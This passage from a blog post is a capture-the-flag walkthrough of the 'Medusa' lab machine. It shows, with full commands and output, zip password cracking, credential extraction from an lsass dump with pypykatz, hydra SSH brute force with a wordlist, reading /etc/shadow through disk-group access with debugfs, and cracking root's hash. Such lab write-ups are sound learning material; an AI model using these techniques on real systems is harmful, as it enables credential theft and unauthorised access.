for status\nmedusa666        (old_files.zip\/lsass.DMP)     \n1g 0:00:02:29 DONE (2024-04-26 05:20) 0.006673g\/s 37778p\/s 37778c\/s 37778C\/s meeker75..medabe15\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ john hash --show                                     \nold_files.zip\/lsass.DMP:medusa666:lsass.DMP:old_files.zip:old_files.zip\n\n1 password hash cracked, 0 left<\/code><\/pre>\n<p>Sigh, carry on and decrypt it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ 7z x old_files.zip \n\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\n 64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024\n\nScanning the drive for archives:\n1 file, 12387024 bytes (12 MiB)\n\nExtracting archive: old_files.zip\n--\nPath = old_files.zip\nType = zip\nPhysical Size = 12387024\n\nEnter password (will not be echoed):\nEverything is Ok\n\nSize:       34804383\nCompressed: 12387024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ ls -la\ntotal 70296\ndrwxr-xr-x  2 kali kali     4096 Apr 26 05:22 .\ndrwxr-xr-x 71 kali kali     4096 Apr 26 04:06 ..\n-rw-r--r--  1 kali kali 24773794 Apr 26 05:15 hash\n-rwxr-xr-x  1 kali kali 34804383 Jan 17  2023 lsass.DMP\n-rw-r--r--  1 root root 12387024 Apr 26 05:09 old_files.zip<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753490.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753490.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426172720991\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753491.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426172810689\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Give it a try:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753492.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753492.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426172955869\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump 
lsass.DMP\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump lsass.DMP | grep &quot;password&quot;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ pypykatz lsa minidump lsass.DMP | grep &quot;username&quot;<\/code><\/pre>\n<h3>Brute-forcing SSH<\/h3>\n<p>Try putting together a wordlist:<\/p>\n<pre><code class=\"language-apl\">4v1jn3y4m_zxc\nt0p_s3cr3t\n4l13num_qwerty\np0w3rf1ll_abc\npr0xy_ch41ns_456\nn0s_v0lv1m0s_4_1lusi0n4r\nlittl3_h4ck3r\nn1mb3r_s1x\nb4ck3nd_pr0gr4m3r\nWh1t3_h4ck\nth3_b0ss\n5p3ctr3_p0is0n_xX\nlittl3_h4ck3r_v2\nb1zum_3_AM\nUnD3sc0n0c1d0\nbr4in_br34k3r\n123456  <\/code><\/pre>\n<p>Those are the passwords; there is also a list of users:<\/p>\n<pre><code class=\"language-apl\">avijneyam\npowerful\nshelldredd\nalienum\nPr0xy\nClaor\nnolo\nnumero6\nct0l4\nLordP4\nsml\nspectre\nRiJaba1\njabatron\nInfayerTS\nd4t4s3c\nMedusa\ncromiphi<\/code><\/pre>\n<p>Run the brute force:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/medusa]\n\u2514\u2500$ hydra -L user.txt -P pass.txt ssh:\/\/192.168.0.109 \nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 05:40:46\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 306 login tries (l:18\/p:17), ~20 tries per task\n[DATA] attacking ssh:\/\/192.168.0.109:22\/\n[22][ssh] host: 192.168.0.109   login: spectre   password: 5p3ctr3_p0is0n_xX\n[STATUS] 293.00 tries\/min, 293 tries in 00:01h, 16 to do in 00:01h, 13 active\n1 of 1 target successfully completed, 1 valid password found\nHydra 
(https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 05:41:53<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753493.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261753493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426174233480\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">spectre@medusa:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .\ndrwxr-xr-x 3 root    root    4096 Jan 15  2023 ..\n-rw------- 1 spectre spectre  197 Jan 21  2023 .bash_history\n-rw-r--r-- 1 spectre spectre  220 Jan 15  2023 .bash_logout\n-rw-r--r-- 1 spectre spectre 3526 Jan 15  2023 .bashrc\ndrwxr-xr-x 3 spectre spectre 4096 Jan 18  2023 .local\n-rw-r--r-- 1 spectre spectre  807 Jan 15  2023 .profile\n-rw------- 1 spectre spectre   44 Jan 18  2023 user.txt\nspectre@medusa:~$ cat user.txt \ngood job!\n\n487a5d1ce02c53fbf60c3abd300d9ff5\nspectre@medusa:~$ sudo -l\n[sudo] password for spectre: \nSorry, user spectre may not run sudo on medusa.\nspectre@medusa:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in 
\/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nspectre@medusa:~$ ss -tnlup\nNetid          State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process          \nudp            UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*                             \ntcp            LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*                             \ntcp            LISTEN          0               511                                  *:80                                *:*                             \ntcp            LISTEN          0               32                                   *:21                                *:*                             \ntcp            LISTEN          0               128                               [::]:22                             [::]:*                             \nspectre@medusa:~$ 
whoami;id\nspectre\nuid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)<\/code><\/pre>\n<h3>Reading files from the disk<\/h3>\n<p>We find that we have disk read permission<\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/interesting-groups-linux-pe#disk-group\">https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/interesting-groups-linux-pe#disk-group<\/a><\/p>\n<pre><code class=\"language-bash\">spectre@medusa:~$ \/usr\/sbin\/debugfs -w \/dev\/sda1\ndebugfs 1.46.2 (28-Feb-2021)\ndebugfs:  cat \/root\/root.txt\n\/root\/root.txt: File not found by ext2_lookup \ndebugfs:  cat \/root\/.ssh\/id_rsa\n\/root\/.ssh\/id_rsa: File not found by ext2_lookup \ndebugfs:  cat \/etc\/shadow\nroot:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0\/0nCh3nrIBmwEEHJ6\/kDU45031VFCWc2:19375:0:99999:7:::\ndaemon:*:19372:0:99999:7:::\nbin:*:19372:0:99999:7:::\nsys:*:19372:0:99999:7:::\nsync:*:19372:0:99999:7:::\ngames:*:19372:0:99999:7:::\nman:*:19372:0:99999:7:::\nlp:*:19372:0:99999:7:::\nmail:*:19372:0:99999:7:::\nnews:*:19372:0:99999:7:::\nuucp:*:19372:0:99999:7:::\nproxy:*:19372:0:99999:7:::\nwww-data:*:19372:0:99999:7:::\nbackup:*:19372:0:99999:7:::\nlist:*:19372:0:99999:7:::\nirc:*:19372:0:99999:7:::\ngnats:*:19372:0:99999:7:::\nnobody:*:19372:0:99999:7:::\n_apt:*:19372:0:99999:7:::\nsystemd-network:*:19372:0:99999:7:::\nsystemd-resolve:*:19372:0:99999:7:::\nmessagebus:*:19372:0:99999:7:::\nsystemd-timesync:*:19372:0:99999:7:::\nsshd:*:19372:0:99999:7:::\nspectre:$y$j9T$4TeFHbjRqRC9royagYTTJ\/$KnU7QK1u0\/5fpHHqE\/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::\nsystemd-coredump:!*:19372::::::\nftp:*:19372:0:99999:7:::\ndebugfs:  q<\/code><\/pre>\n<h3>Cracking the root password<\/h3>\n<p>Try cracking it:<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# vim hash.txt  \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nNo password hashes loaded (see FAQ)\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/medusa]\n\u2514\u2500# john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt --format=crypt\nUsing default input encoding: UTF-8\nLoaded 1 password hash (crypt, generic crypt(3) [?\/64])\nCost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes\nCost 2 (algorithm specific iterations) is 1 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nandromeda        (root)     \n1g 0:00:00:19 DONE (2024-04-26 05:49) 0.05005g\/s 187.3p\/s 187.3c\/s 187.3C\/s 19871987..street\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>Try switching user:<\/p>\n<pre><code class=\"language-bash\">spectre@medusa:~$ su -l root\nPassword: \nroot@medusa:~# ls -la\ntotal 28\ndrwx------  3 root root 4096 Jan 30  2023 .\ndrwxr-xr-x 19 root root 4096 Jan 15  2023 ..\nlrwxrwxrwx  1 root root    9 Jan 15  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3526 Jan 17  2023 .bashrc\ndrwxr-xr-x  3 root root 4096 Jan 15  2023 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   53 Jan 18  2023 .rO0t.txt\n-rw-r--r--  1 root root   66 Jan 30  2023 .selected_editor\nroot@medusa:~# cat .rO0t.txt \ncongrats hacker :)\n\n34b1e6fc5e7fe0bfd56ed4b8776c9f5b<\/code><\/pre>\n<p>Got a root shell!!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Medusa Information gathering Port scanning 
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/medusa] \u2514\u2500$ rustscan [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-633","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=633"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633\/revisions"}],"predecessor-version":[{"id":635,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/633\/revisions\/635"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=633"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=633"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=633"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}